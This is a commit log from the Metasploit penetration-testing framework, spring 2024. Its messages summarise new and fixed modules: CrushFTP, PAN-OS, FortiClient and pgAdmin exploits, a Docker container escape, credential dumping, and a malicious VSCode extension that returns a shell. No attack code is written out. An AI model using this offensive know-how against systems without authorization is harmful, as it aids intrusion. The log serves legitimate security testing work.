Metasploit 0b9d4654a4 automatic module_metadata_base.json update 2024-05-07 09:03:06 -05:00
Christophe De La Fuente 946cc3baf1 Land #19147, Auxiliary module for CVE-2024-4040 - CrushFTP arbitrary file read 2024-05-07 15:44:24 +02:00
Spencer McIntyre 5523f13394 Fix a message that should refer to LDAP::Signing 2024-05-06 09:40:28 -04:00
Metasploit cec01fb2c8 automatic module_metadata_base.json update 2024-05-06 08:30:55 -05:00
Spencer McIntyre 47c8d7252b Land #18519, Docker kernel module escape 2024-05-06 09:08:08 -04:00
h00die 0b5eaef1f7 jasmin_ransomware fix check methods 2024-05-04 16:06:48 -04:00
h00die 753ca1da61 reviews for jasmin ransomware panel 2024-05-04 15:56:11 -04:00
h00die 8240b869b9 reviews for jasmin ransomware panel 2024-05-04 15:56:11 -04:00
h00die 9c030b027a fix tablein jasmin docs 2024-05-04 15:56:11 -04:00
h00die 24c689dfde jasmin ransomware sqli and dir travers 2024-05-04 15:56:10 -04:00
h00die d18700ec3b jasmin ransomware sqli and dir travers 2024-05-04 15:56:10 -04:00
RadioLogic fb62edbcb1 Merge pull request #1 from smcintyre-r7/pr/collab/18519
Added in suggestions by mcintyre
2024-05-03 22:27:40 -04:00
bwatters b044bcab01 Add command payloads and checks for overwritten files 2024-05-03 13:06:16 -05:00
remmons-r7 5653ea5dfb Implement peer review suggestions for documentation
Revise 'Options' section to format each option as a level-3 heading
Update to latest module console output in 'Scenarios'
2024-05-03 12:24:42 -05:00
remmons-r7 9ee3cfd057 Implement peer review suggestions
Added multiple API endpoint injection options
Added TARGETURI to support different reverse proxy configurations
Confirmed that different languages are supported
Removed RHOST 0.0.0.0 default
Set STORE_LOOT to optional and set default to "false"
Added more detail to every check and fail message
Moved print_status message after STORE_LOOT
2024-05-03 12:01:48 -05:00
Spencer McIntyre 69d603e6fc Switch to an enum option for the signing 2024-05-03 10:27:10 -04:00
Metasploit a0487348e5 automatic module_metadata_base.json update 2024-05-03 08:50:04 -05:00
adfoster-r7 4c84f8830f Land #18907, add mssql_version module 2024-05-03 14:33:35 +01:00
Christophe De La Fuente 69cbddde92 Land #19050, Adobe ColdFusion Arbitrary File Read [CVE-2024-20767] 2024-05-03 15:15:08 +02:00
adfoster-r7 a9960a506c Land #19125, updates mssql platform/arch fingerprinting to be more resilient 2024-05-03 13:58:06 +01:00
adfoster-r7 860da5f2b4 Land #19158, reimplement password_spray into login modules 2024-05-03 13:39:36 +01:00
Zach Goldman 6547fdb4c4 adds pattern to catch other arch and platform values 2024-05-03 07:05:35 -05:00
cgranleese-r7 bb473f4004 Reimplement password_spray into login modules 2024-05-03 13:00:24 +01:00
Zach Goldman c382066be8 cache prelogin packet 2024-05-02 12:51:33 -05:00
Jack Heysel e3d7dce4a9 Updated res.body parsing, responded to comments 2024-05-02 09:47:22 -07:00
remmons-r7 7f433bfadb Implement peer review suggestion to move IOC comments up 2024-05-02 11:44:39 -05:00
remmons-r7 6c91ca37b6 Implement peer review suggestion to add CrushFTP10.zip SHA256 2024-05-02 11:42:49 -05:00
remmons-r7 168eb9e14d Implement peer review suggestion to remove unnecessary STORE_LOOT check
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2024-05-02 11:13:54 -05:00
remmons-r7 9e8fe15e48 Implement peer review suggestion for more detailed fail_with message
Co-authored-by: adfoster-r7 <60357436+adfoster-r7@users.noreply.github.com>
2024-05-02 11:11:04 -05:00
adfoster-r7 fd10f4d295 Land #19156, Fixes password_spray not using additional_privates and default username 2024-05-02 16:20:10 +01:00
cgranleese-r7 d105ae10ff Fixes some password_spray issues 2024-05-02 15:43:07 +01:00
Metasploit 4c7f1e6520 Bump version of framework to 6.4.8 2024-05-02 03:37:55 -05:00
Metasploit bd767a9279 automatic module_metadata_base.json update 2024-05-01 16:26:41 -05:00
Spencer McIntyre 1bf721b9d5 Land #19152, Fix apache_normalize_path_rce check
Fix apache_normalize_path_rce check method
2024-05-01 17:10:23 -04:00
h00die 80b4cb7721 remove moved files 2024-05-01 16:08:57 -04:00
adfoster-r7 5e1dc05f09 Fix apache_normalize_path_rce check method 2024-05-01 20:01:38 +01:00
Spencer McIntyre ca669d8f08 Update docs to reflect changes 2024-05-01 13:45:20 -04:00
Spencer McIntyre c2bf9ead06 Add support for redhat based containers
Containers such as Fedora use a different directory for the kernel
headers.
2024-05-01 13:30:16 -04:00
DaveYesland c2a561630d Add local privesc module for Flowmon 2024-05-01 09:07:34 -07:00
DaveYesland a7e97e50ad Add module for flowmon cmd injection CVE-2024-2389 2024-05-01 08:42:55 -07:00
Spencer McIntyre 2cb0e44740 Don't change the working directory 2024-05-01 10:35:24 -04:00
Metasploit 2dce73833f automatic module_metadata_base.json update 2024-05-01 08:45:48 -05:00
adfoster-r7 59a3839be8 Land #19137, nameservers from resolv.conf must be IP addresses 2024-05-01 14:28:38 +01:00
Spencer McIntyre a98554a1f4 Land #19048, Enable inline credentials dump
Windows Secrets Dump: Enable inline credentials dump
2024-05-01 09:05:40 -04:00
Spencer McIntyre 67dc01f124 Remove the unnecessary payload space 2024-04-30 16:29:43 -04:00
adfoster-r7 fef9024c5a Land #19148, Update pcaprub dependency 2024-04-30 21:18:34 +01:00
adfoster-r7 27dd14bb64 Update pcaprub dependency 2024-04-30 20:48:24 +01:00
Christophe De La Fuente 6849e909d0 Code review
- remove `#auxiliary_commands`, it is not necessary anymore
- move the connection logic to a separate method
- make sure the connection to Winreg is setup when using direct `read`
  and `write` commands
- fix wrong method call to `save_to_file`
2024-04-30 20:57:32 +02:00
Christophe De La Fuente 91be90c43e Add registry_security_descriptor module and documentation 2024-04-30 20:57:32 +02:00
Christophe De La Fuente 52001bf7d4 Bump ruby_smb to version 3.3.7
- This will bring in the GetKeySecurity and SetKeySecurity MS-RRP structures
2024-04-30 20:54:15 +02:00
Christophe De La Fuente 9079ce331b Remove call to each_key on users array, since it is not a Hash 2024-04-30 20:52:23 +02:00
remmons-r7 de82fdac50 Remove trailing whitespaces 2024-04-30 12:33:26 -05:00
remmons-r7 8b1b940f7c Fixing a spacing issue that was introduced, as well as a couple msftidy issues 2024-04-30 12:19:16 -05:00
remmons-r7 5765fe8197 Implement fixes for msftidy issues
C: 21: 11: [Correctable] Layout/ModuleDescriptionIndentation: Module descriptions should be properly aligned to the 'Description' key, and within %q{ ... }
C: 67: 54: [Correctable] Style/StringLiterals: Prefer single-quoted strings when you don't need string interpolation or special symbols.
C: 81: 18: [Correctable] Style/StringLiterals: Prefer single-quoted strings when you don't need string interpolation or special symbols.
C: 87: 40: [Correctable] Style/InverseMethods: Use !~ instead of inverting =~.
W: 92: 50: [Correctable] Lint/SafeNavigationChain: Do not chain ordinary method call after safe navigation operator.
W:110: 63: [Correctable] Lint/SafeNavigationChain: Do not chain ordinary method call after safe navigation operator.
W:127: 54: [Correctable] Lint/RedundantStringCoercion: Redundant use of Object#to_s in interpolation.
C:143:  7: [Correctable] Layout/FirstHashElementIndentation: Use 2 spaces for indentation in a hash, relative to the start of the line where the left curly brace is.
C:146: 20: [Correctable] Layout/SpaceInsideHashLiteralBraces: Space inside { missing.
C:146: 44: [Correctable] Layout/SpaceInsideHashLiteralBraces: Space inside } missing.
C:152: 18: [Correctable] Style/RedundantInterpolation: Prefer to_s over string interpolation.
C:152: 32: [Correctable] Style/SlicingWithRange: Prefer [-4..] over [-4..-1].
C:153:  9: [Correctable] Layout/FirstHashElementIndentation: Indent the right brace the same as the start of the line where the left brace is.
2024-04-30 12:09:28 -05:00
remmons-r7 e19ae7c3d1 Remove space before file output 2024-04-30 11:52:07 -05:00
remmons-r7 4e81de2968 Add CVE-2024-4040 exploit module 2024-04-30 11:43:37 -05:00
remmons-r7 d7b63679c9 Add documentation markdown for crushftp_fileread_cve_2024_4040 2024-04-30 11:24:43 -05:00
Metasploit d6b45658e0 automatic module_metadata_base.json update 2024-04-29 17:55:45 -05:00
Spencer McIntyre 434186200a Land #19141, Apache RocketMQ & ActiveMQ fixes 2024-04-29 18:33:47 -04:00
jheysel-r7 6055d8a005 Apply suggestions from code review
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-04-29 17:37:49 -04:00
bwatters 742326ae90 Actually add script contents 2024-04-29 15:28:34 -05:00
bwatters d94971598b Add documentation and fix some debug prints 2024-04-29 15:28:34 -05:00
bwatters 8a08f6a083 Land #19075, Modularise the Softing login code
Merge branch 'land-19075' into upstream-master
2024-04-29 14:47:44 -05:00
Jack Heysel 6c74d14bb7 Tested attempt to fix rspec 2024-04-29 08:54:57 -07:00
RadioLogic 53ac5118cd Added report host to virtualization check 2024-04-26 21:58:43 -04:00
RadioLogic 15a9b59ccf Made case statements more readable 2024-04-26 21:55:01 -04:00
RadioLogic b51d1b9017 Made shared function with checkcontainer 2024-04-26 21:32:20 -04:00
Metasploit 518aafb1f1 automatic module_metadata_base.json update 2024-04-26 18:37:25 -05:00
bwatters 364d491af7 Land #18972, Progress LoadMaster unauthenticated command injection module CVE-2024-1212
Merge branch 'land-18972' into upstream-master
2024-04-26 18:18:40 -05:00
bwatters 02c31159ab Add vulnerable versions and fix indention 2024-04-26 17:36:50 -05:00
Jack Heysel f5f1deaf5b Untested attempt to fix spec 2024-04-26 14:55:45 -07:00
Jack Heysel 3b57fbf052 ActiveMQ fixes 2024-04-26 14:25:16 -07:00
Jack Heysel 429eaff5ca RocketMQ fixes 2024-04-26 14:24:08 -07:00
RadioLogic 7dabfb15be Ran rubocop again 2024-04-26 14:52:14 -04:00
h00die 45312a506d further x11 revisions 2024-04-26 14:49:22 -04:00
RadioLogic ca9c60badb Made usermodhelper wait for exec 2024-04-26 14:43:39 -04:00
RadioLogic 81aa572e15 Removed uneeded cd in cleanup 2024-04-26 14:15:24 -04:00
RadioLogic 852f888cc8 Added payload limits 2024-04-26 14:06:32 -04:00
RadioLogic 5adc91b7d5 Reverted back to using relative pathing due to kernel make scripts 2024-04-26 13:46:17 -04:00
Christophe De La Fuente 4f6e2bcd22 Code review 2024-04-26 18:47:42 +02:00
Christophe De La Fuente 4794844b67 Update the documentation 2024-04-26 18:44:05 +02:00
Christophe De La Fuente 1294ed0bbb Add inline technique to dump SAM hashes, LSA secrets and cached hashes 2024-04-26 18:44:05 +02:00
Jack Heysel c0e589dcf4 Updated single quotes 2024-04-26 09:08:08 -07:00
Jack Heysel bf240b7e43 Responded to comments 2024-04-26 09:04:33 -07:00
Metasploit a6cf1cd414 automatic module_metadata_base.json update 2024-04-26 07:52:01 -05:00
adfoster-r7 7e2e3eeab3 Land #19138,fix recursive call to ldap_open 2024-04-26 13:35:30 +01:00
Dean Welch 1c8a4706d7 Fix recursive call to ldap_open 2024-04-26 12:33:43 +01:00
Spencer McIntyre cf6d324832 Nameservers from resolv.conf must be IP addresses
Fixes an infinite recursion error where Metasploit would attempt to
resolve a nameserver specified as a hostname in /etc/resolv.conf while
initializing.

Values for the namserver key in the resolv.conf file must be IP
addresses per the man page while the Resolver class in theory allows
them to be added by hostname however an existing one must be defined by
which it will be resolved.

This notably prevents IPv6 addresses with a scope ID from being allowed
in Ruby versions < 3.1.
2024-04-25 16:21:04 -04:00
h00die a7b428a6d2 doc update 2024-04-25 15:50:40 -04:00
h00die 83d1dcb1d4 move x11 to be more modular, forgot to grab spec files :( 2024-04-25 15:48:14 -04:00
Metasploit aef3cc546b automatic module_metadata_base.json update 2024-04-25 10:10:09 -05:00
Simon Janusz 76d7fe8dbd Land #19095, Refactor smb_enumusers 2024-04-25 15:45:23 +01:00
dwelch-r7 cd40f95f05 Land #19134, Downgrade unf ext 2024-04-25 15:25:05 +01:00
adfoster-r7 c1e5c7a8bf Downgrade unf_ext 2024-04-25 15:08:31 +01:00
Spencer McIntyre d6317923f6 Bump ruby_smb to 3.3.6
This pulls in the changes from rapid7/ruby_smb#266 which adds
SamrQueryInformationDomain support.
2024-04-25 09:41:48 -04:00
Metasploit b607c70611 Bump version of framework to 6.4.7 2024-04-25 03:35:58 -05:00
h00die 9ed9ea8c38 add event_dependent to northstar_c2 2024-04-24 16:54:58 -04:00
h00die dd5a8c629f northstar_c2 adjustments 2024-04-24 16:54:02 -04:00
h00die 19af4ae4e6 mermaid flow chart 2024-04-24 16:54:02 -04:00
h00die 9fb217fb59 northstar c2 exploit 2024-04-24 16:54:02 -04:00
h00die 7f02902ba1 add event_dependent to chaos_xss 2024-04-24 16:53:24 -04:00
h00die 512da4bc45 chaos rat xss to rce 2024-04-24 16:51:58 -04:00
h00die 417e7c1302 x11 progress 2024-04-24 16:46:37 -04:00
Spencer McIntyre 1c8d62abc1 Land #19129, Add missing '-S' to cmd_notes 2024-04-24 15:57:33 -04:00
Metasploit 1e4e62dc43 automatic module_metadata_base.json update 2024-04-24 14:29:51 -05:00
Jack Heysel aea95c052e Land #18723, Improve Gitlab fingerprinting
A webpage exists that can be reached without authentication that
contains a hash that can be used to determine the approximate version of
gitlab running on the endpoint. This PR adds enhances our current GitLab
fingerprinting capabilities to include the aforementioned technique.
2024-04-24 12:13:15 -07:00
Zach Goldman 04c5d8b924 Update modules/auxiliary/scanner/mssql/mssql_version.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2024-04-24 15:06:37 -04:00
Zach Goldman d8c7a26565 add unit test, clean up data hash 2024-04-24 15:06:36 -04:00
Zach Goldman d0a714d1e8 refactor packet parsing code 2024-04-24 15:06:36 -04:00
Zach Goldman ae091bf17d add encryption detection, reporting to mssql_version 2024-04-24 15:06:36 -04:00
Zach Goldman 6fd8c8b903 add session support, dry out code, update descriptions to be more specific 2024-04-24 15:06:36 -04:00
Zach Goldman 3897b49ca6 add mssql_version module 2024-04-24 15:06:36 -04:00
Jack Heysel bc4a532cd7 Changed format of GITLAB_CSS_MAP 2024-04-24 11:38:22 -07:00
Noam Rathaus cadda6f1a3 Fix rspec for cmd_notes 2024-04-24 20:46:32 +03:00
Jack Heysel 8b48d3d056 Print RPORT as well as IP when printing version 2024-04-24 10:20:59 -07:00
Metasploit e6fb1789f4 automatic module_metadata_base.json update 2024-04-24 12:15:44 -05:00
Jack Heysel bd2b1e5f00 Removed redundant use of Object#to_s in interpolation 2024-04-24 10:09:20 -07:00
Jack Heysel f018295509 Ensure range of Rex::Version objects are always returned 2024-04-24 10:00:16 -07:00
adfoster-r7 e5cf357f9e Land #19078, ldap acceptance tests 2024-04-24 17:59:24 +01:00
Dean Welch 33ffc14e6b Use samba ad container for ldap 2024-04-24 11:38:41 +01:00
Noam Rathaus 99c56c5410 Add missing '-S' 2024-04-24 12:24:01 +03:00
Ashley Donaldson 6d915dbb55 Fix unit tests 2024-04-24 15:54:57 +10:00
Ashley Donaldson 631e4e34db Update LDAP doco with current options 2024-04-24 15:40:11 +10:00
Ashley Donaldson 68966b86f1 Give warning on invalid config (SSL and REQUIRE_SIGNING both set to true) 2024-04-24 15:05:03 +10:00
Ashley Donaldson ec44cb1e2e Fix interface of block cipher base 2024-04-24 14:01:45 +10:00
Ashley Donaldson a4b3c27e28 Provide more meaningful error message when signing is required 2024-04-24 13:37:27 +10:00
Ashley Donaldson b5f4dfae71 Make encrypting/signing an option 2024-04-24 13:24:05 +10:00
Ashley Donaldson 9aead31bb9 Support encrypted LDAP (ldap signing) over Kerberos and NTLM 2024-04-24 12:56:06 +10:00
RadioLogic ecb70eeb8c Rubocop ran on file 2024-04-23 18:53:16 -04:00
RadioLogic f8f7eb919f Removed all use of path traversal for absolute paths 2024-04-23 18:48:33 -04:00
RadioLogic 1c8c91096f Removed port being in documentation as it made no sense 2024-04-23 18:47:30 -04:00
jvoisin 5ff05b7cec Add more fingerprints 2024-04-24 00:12:01 +02:00
Metasploit 71ce807300 automatic module_metadata_base.json update 2024-04-23 16:47:00 -05:00
adfoster-r7 718cc0fff4 Land #19122, add EVENT_DEPENDENT to vcenter vmon priv esc 2024-04-23 22:29:53 +01:00
RadioLogic 361fe34167 Update modules/exploits/linux/local/docker_privileged_container_kernel_escape.rb
Used rex to add in payload

Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2024-04-23 17:29:07 -04:00
RadioLogic bee5306ac9 Added suggestions by rubymine 2024-04-23 17:18:30 -04:00
h00die 0ba2880352 fix spec for event-dependent 2024-04-23 16:49:23 -04:00
Metasploit 01f6ebfd74 automatic module_metadata_base.json update 2024-04-23 13:44:39 -05:00
bwatters ed8a9e2831 Land #19124, Fixed output of db_import command in spec
Merge branch 'land-19124' into upstream-master
2024-04-23 13:17:10 -05:00
Zach Goldman 26a108aadc Land #19046, Apache Solr Backup Restore RCE [CVE-2023-50386] 2024-04-23 14:08:33 -04:00
Jack Heysel 83df7bee65 Fixed output of db_import command in spec 2024-04-23 08:28:06 -07:00
Jack Heysel e3625307b3 Land #18914, Add OpenVAS import improvement
This PR adds functionality so that CVE and URL references will be
imported from an OpenVAS XML report by default. DNF-CERT and CERT-BUND
references can also be collected by sending additional flags to the
db_import command
2024-04-22 18:11:33 -07:00
Dave Yesland a36244073f Merge pull request #1 from bwatters-r7/update-18972
Remove Priv Esc to add it to another module and update it to only run…
2024-04-22 17:53:48 -07:00
Dave Yesland c10bde97ff Merge branch 'rapid7:master' into module/progress_kemp_loadmaster_unauth_cmd_injection 2024-04-22 17:53:32 -07:00
Julien Voisin 0b1a4e2a99 Apply suggestions from code review
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2024-04-23 01:05:57 +02:00
jvoisin e5bb593607 Improve how we fingerprint Gitlab versions
Since I was the one suggesting it in #18716, I kinda volunteered to implement
it. This improvement is based on [Censys's blogpost](https://censys.com/cve-2021-22205-it-was-a-gitlab-smash/)
on the topic, making use of the `/assets/application-….css` files that have
a unique name per gitlab versions.

The fingerprints were acquired with this bash script:

```bash
assetdir="/opt/gitlab/embedded/service/gitlab-rails/public/assets"
tags=$(curl "https://hub.docker.com/v2/repositories/gitlab/gitlab-ce/tags?page_size=100" | jq -r '.results[].name')

for tag in $tags; do
    filename=$(docker run --quiet --rm -it --entrypoint "" gitlab/gitlab-ce:$tag ls $assetdir|egrep '^application-.*\.css' | grep -v \.gz | cut -d' ' -f1)
    echo $tag,$filename
done
```

Co-authored-by: cgranleese-r7 <69522014+cgranleese-r7@users.noreply.github.com>
2024-04-23 01:05:57 +02:00
h00die 3b2d669702 add EVENT_DEPENDENT to spec 2024-04-22 15:38:56 -04:00
h00die 53c2bf2e74 add EVENT_DEPENDENT to vcenter vmon priv esc 2024-04-22 15:12:27 -04:00
h00die 7a27c0f010 some review on x11 2024-04-22 15:07:57 -04:00
Spencer McIntyre a3e3eb9e44 Re-add session support to the smb_enumusers module 2024-04-22 14:18:26 -04:00
Spencer McIntyre eefa762c15 Put username reporting back in 2024-04-22 13:45:20 -04:00
Spencer McIntyre 837e503170 Refactor the MsSamr mixin to split it out 2024-04-22 13:45:20 -04:00
Spencer McIntyre a008288e05 Readd support for multiple ports 2024-04-22 13:45:20 -04:00
Spencer McIntyre eec72b8f54 Start refactoring smb_enumusers to use RubySMB 2024-04-22 13:45:15 -04:00
cgranleese-r7 a554e5251c Land #19106, Routine Gem dependencies update 2024-04-22 11:38:57 +01:00
Metasploit 6397cbe6bf automatic module_metadata_base.json update 2024-04-22 04:43:47 -05:00
cgranleese-r7 4bbe2c306c Land #19079, Fix PASSWORD_SPRAY being ignored for LDAP (and potentially other modules) 2024-04-22 10:22:51 +01:00
Noam Rathaus 533a631ee4 Fix suggestions given by cgranleese-r7 2024-04-21 11:51:21 +03:00
Metasploit a1b9941a8c automatic module_metadata_base.json update 2024-04-19 16:38:22 -05:00
bwatters c6fc5ad2e1 Land #19114, Better enforce types to prevent nil values from causing stack traces
Merge branch 'land-19114' into upstream-master
2024-04-19 16:21:22 -05:00
Spencer McIntyre 5675c59690 Fix blank values for LDAP NTLM auth 2024-04-19 16:30:29 -04:00
Spencer McIntyre f3b426cc73 Fix usages of #empty? too
Fix usages of #empty? in ldap_esc_vulnerable_cert_finder too
2024-04-19 15:49:36 -04:00
Metasploit 672d3ee26e automatic module_metadata_base.json update 2024-04-19 14:35:28 -05:00
Jack Heysel b8675f0fd7 Land #19005, Add Gambio Webshop Unauth RCE
A Remote Code Execution vulnerability in Gambio online webshop version
4.9.2.0 and lower allows remote attackers to run arbitrary commands via
unauthenticated HTTP POST request
2024-04-19 12:18:17 -07:00
Zach Goldman 488653d942 Land #19082, FortiNet FortiClient EMS SQLi to RCE [CVE-2023-48788] 2024-04-19 15:03:22 -04:00
Metasploit dce1a0b4d0 automatic module_metadata_base.json update 2024-04-19 13:10:30 -05:00
bwatters 4733d1dc04 Land #19101, Exploit module for CVE-2024-4300 - Palo Alto Networks PAN-OS
Merge branch 'land-19101' into upstream-master
2024-04-19 12:49:41 -05:00
jheysel-r7 3205fe9e63 Apply suggestions from code review 2024-04-19 13:44:18 -04:00
Spencer McIntyre 3697d4cb77 Land #18956, Rancher CVE-2021-36782
Rancher Authenticated API Credential Exposure (CVE-2021-36782)
2024-04-19 13:27:30 -04:00
Spencer McIntyre d93b97d7c4 Add rancher installation docs 2024-04-19 12:55:46 -04:00
remmons-r7 2ad13ac836 Added note about shell from a different IP than RHOST IP 2024-04-19 11:45:56 -05:00
Metasploit 42a14ef6bf Bump version of framework to 6.4.6 2024-04-19 11:34:11 -05:00
Simon Janusz 248291ae16 Land #19113, Revert "Sql sessions have correct history manager" 2024-04-19 17:11:41 +01:00
Metasploit 4562af58fd automatic module_metadata_base.json update 2024-04-19 10:49:02 -05:00
cgranleese-r7 aa3181cc26 Land #19112, add arch and platform detection for mssql sessions 2024-04-19 16:33:28 +01:00
Zach Goldman 939f4337b0 Land #19089, Fix crash in exim4_deliver_message_priv_esc 2024-04-19 11:05:23 -04:00
Imran E. Dawoodjee 8d6a20634f Attempt to improve file cleanup functionality 2024-04-19 23:05:02 +08:00
Metasploit 91533a8c08 automatic module_metadata_base.json update 2024-04-19 10:03:07 -05:00
Imran E. Dawoodjee afd4b8af2e Remove x86 things, include AutoCheck 2024-04-19 22:49:40 +08:00
adfoster-r7 cff93390c7 Land #19080, Add arch/platform detection for Postgres 2024-04-19 15:46:58 +01:00
Zach Goldman 0c6af95164 adjust mysql logic for unknown platform arch 2024-04-19 09:23:04 -05:00
Zach Goldman 5c89b6aa0e add arch and platform detection for mssql sessions 2024-04-19 08:54:27 -05:00
remmons-r7 4f3ee3f78a Incorporate documentation wording change from suggestion
Co-authored-by: Brendan <bwatters@rapid7.com>
2024-04-19 08:50:20 -05:00
adfoster-r7 92592f979b Land #19105, add more mssql datatypes 2024-04-19 14:47:29 +01:00
Zach Goldman b4dccdfcd6 add more datatypes 2024-04-19 08:38:22 -05:00
Metasploit b30ff7df3c automatic module_metadata_base.json update 2024-04-19 08:33:51 -05:00
adfoster-r7 376bdefefb Land #19054, Add NText column parsing to MSSQL 2024-04-19 14:17:50 +01:00
Spencer McIntyre f5046d0c2a Fix the return value of a few methods 2024-04-19 09:06:48 -04:00
adfoster-r7 7e25088615 Land #19066, Add smb acceptance tests 2024-04-19 13:38:04 +01:00
sjanusz-r7 bf50da5e8f Add SMB acceptance tests 2024-04-19 12:49:44 +01:00
adfoster-r7 b488cebeba Revert "Sql sessions have correct history manager" 2024-04-19 11:59:30 +01:00
cgranleese-r7 aeafa4a756 Land #19088, Add docs for running and writing Metasploit's unit tests 2024-04-19 11:55:20 +01:00
adfoster-r7 adf8a8be5f Land #19086, update Metasploit RPC to expose module default_options 2024-04-19 11:35:44 +01:00
cgranleese-r7 b83f2e3e6c Updates handling of arm for both PostgreSQL and MySQL 2024-04-19 11:11:12 +01:00
Noam Rathaus 8526938946 Change the order to make the test work with the yield 2024-04-19 07:59:33 +03:00
Noam Rathaus c09ba17b34 Change order so that the second is a yield 2024-04-19 07:57:41 +03:00
Metasploit 211de574aa automatic module_metadata_base.json update 2024-04-18 20:32:53 -05:00
Jack Heysel 27f5ad8e05 Land #18996, VSCode Malicious Ext module
This PR adds a new exploit that creates a malicious vsix file. a vsix
file is a VS and VSCode extension file. Once installed, the users
computer will call back with a shell. Its not a bug, its a feature!
2024-04-18 18:10:46 -07:00
Metasploit e9d4f3e99c automatic module_metadata_base.json update 2024-04-18 19:45:19 -05:00
Jack Heysel bcaa5359da Land #18997, Add GitLens VSCode Extension Exploit
GitKraken GitLens before v.14.0.0 allows an untrusted workspace to
execute git commands. A repo may include its own .git folder including a
malicious config file to execute arbitrary code.
2024-04-18 17:19:41 -07:00
adfoster-r7 ba18e63e2d Land #19109, Fixes pry-byebug functionality when running credential_collection_spec.rb 2024-04-19 00:55:04 +01:00
remmons-r7 5df1052037 Addressing msftidy issues
C:132: 20: [Correctable] Layout/SpaceAroundBlockParameters: Space before first block parameter detected.
C:132: 30: [Correctable] Layout/SpaceAroundBlockParameters: Space after last block parameter detected.
C:133:  5: [Correctable] Layout/IndentationWidth: Use 2 (not 4) spaces for indentation.
C:143:  4: [Correctable] Layout/TrailingEmptyLines: Final newline missing.
2024-04-18 18:34:18 -05:00
remmons-r7 982b6aef0a Incorporating PAN-OS module peer review suggestions, adding documentation for the module 2024-04-18 18:21:12 -05:00
Zach Goldman d35748497c adds ntext parsing to mssql 2024-04-18 16:41:37 -05:00
h00die a551ef136c remove default shells on gitlens module 2024-04-18 17:31:02 -04:00
bwatters c9dfb7e34f Land #19111, Use #compatible_payloads in #validate
Merge branch 'land-19111' into upstream-master
2024-04-18 15:43:53 -05:00
Spencer McIntyre 854d22e5db Land #17294, Add additional reliability metadata 2024-04-18 15:26:34 -04:00
h00die-gr3y 331c961412 update module and documentation with tax country logic 2024-04-18 19:13:19 +00:00
Spencer McIntyre fd707f4f87 Refresh the cache after adding the new path 2024-04-18 13:25:47 -04:00
Spencer McIntyre ff295aa5bc Use #compatible_payloads in #validate
This updates the #validate methods to check if the selected payload is
in the modules list of compatible payloads instead of just checking the
platform.
2024-04-18 11:47:12 -04:00
cgranleese-r7 c694522680 Improves test and updates regex handling 2024-04-18 15:45:36 +01:00
adfoster-r7 651f137e94 Routine Gem dependencies update 2024-04-18 15:28:57 +01:00
cgranleese-r7 4186d00720 Fixes pry-byebug when running credential collection tests 2024-04-18 14:30:06 +01:00
remmons-r7 22d3ee5df2 Changing the wording for TARGETURI 2024-04-18 08:25:06 -05:00
remmons-r7 cea9fb66ed Swap out staged payload for unstaged
Co-authored-by: Brendan <bwatters@rapid7.com>
2024-04-18 08:21:18 -05:00
Metasploit 13a79ab536 Bump version of framework to 6.4.5 2024-04-18 03:37:54 -05:00
adfoster-r7 0e1961d7e9 Add additional reliability metadata 2024-04-17 21:47:27 +01:00
remmons-r7 9741b12d29 Addressing a new issue the linter caught after changes
W:117:  5: [Correctable] Lint/UselessAssignment: Useless assignment to variable - res.
2024-04-17 15:44:45 -05:00
h00die 01d86b6966 spell jupyter better than the advisory 2024-04-17 16:43:05 -04:00
remmons-r7 7e191c75e7 Addressing msftidy issues
Fixes for the following:
W: 80:  5: [Correctable] Lint/UselessAssignment: Useless assignment to variable - res_create_file. Did you mean res_check_created?
C: 90: 81: [Correctable] Style/TrailingCommaInArguments: Avoid comma after the last parameter of a method call.
C: 93:  8: [Correctable] Style/InverseMethods: Use != instead of inverting ==.
C: 93: 42: [Correctable] Style/AndOr: Use && instead of and.
C: 93: 46: [Correctable] Style/InverseMethods: Use != instead of inverting ==.
C: 94: 43: [Correctable] Style/StringLiterals: Prefer single-quoted strings when you don't need string interpolation or special symbols.
C💯 18: [Correctable] Style/StringLiterals: Prefer single-quoted strings when you don't need string interpolation or special symbols.
C:131: 18: [Correctable] Style/StringLiterals: Prefer single-quoted strings when you don't need string interpolation or special symbols.
2024-04-17 15:40:08 -05:00
h00die c8d9702b37 vscode ipynb review 2024-04-17 16:35:10 -04:00
h00die ecac5c8fa8 vsix review 2024-04-17 16:13:44 -04:00
h00die 244c901dbe rancher review 2024-04-17 16:10:24 -04:00
h00die bae1a2e20f gitlens review 2024-04-17 16:06:32 -04:00
remmons-r7 275345b68d Fix single char 2024-04-17 13:54:58 -05:00
remmons-r7 41e19d7759 Draft of CVE-2024-3400 module 2024-04-17 13:52:50 -05:00
Metasploit 607fb09391 automatic module_metadata_base.json update 2024-04-17 09:16:24 -05:00
Spencer McIntyre 727849202d Land #19087, chore: remove repetitive words 2024-04-17 09:59:46 -04:00
Metasploit a03b9e904f automatic module_metadata_base.json update 2024-04-17 07:54:24 -05:00
adfoster-r7 2116457510 Land #19099, Add https prefix to module URL references 2024-04-17 13:38:30 +01:00
sjanusz-r7 010f044117 Add https prefix to module URL references 2024-04-17 13:00:41 +01:00
Metasploit c83a219ae4 automatic module_metadata_base.json update 2024-04-16 16:37:56 -05:00
Jack Heysel 84ea514180 Land #19026, Add pgadmin exploit CVE-2024-2044
This adds an exploit for pgAdmin <= 8.3 which is a path traversal
vulnerability in the session management that allows a Python pickle
object to be loaded and deserialized. This also adds a new Python
deserialization gadget chain to execute the code in a new thread so the
target application doesn't block the HTTP request.
2024-04-16 14:12:41 -07:00
Spencer McIntyre 9cf4372f2b Clean up some of the module's documentation 2024-04-16 13:36:21 -04:00
cgranleese-r7 3481d4f3bc Adds test for regex that matches arch and platfrom 2024-04-16 11:31:48 +01:00
bwatters 409f0e45a6 Remove Priv Esc to add it to another module and update it to only run once 2024-04-15 15:44:22 -05:00
cgranleese-r7 3f2e32ef6a Add arch/platform detection for Postgres 2024-04-15 16:04:57 +01:00
Noam Rathaus 1f90057761 and_return rather than and_yield 2024-04-15 15:07:16 +03:00
Noam Rathaus ebf94ee7f7 Created spec test for password_spray 2024-04-15 14:30:55 +03:00
adfoster-r7 6bb9a65f8d Add docs for running and writing unit tests 2024-04-15 12:01:18 +01:00
Noam Rathaus e9da6673a2 No need for ( ) 2024-04-15 13:53:03 +03:00
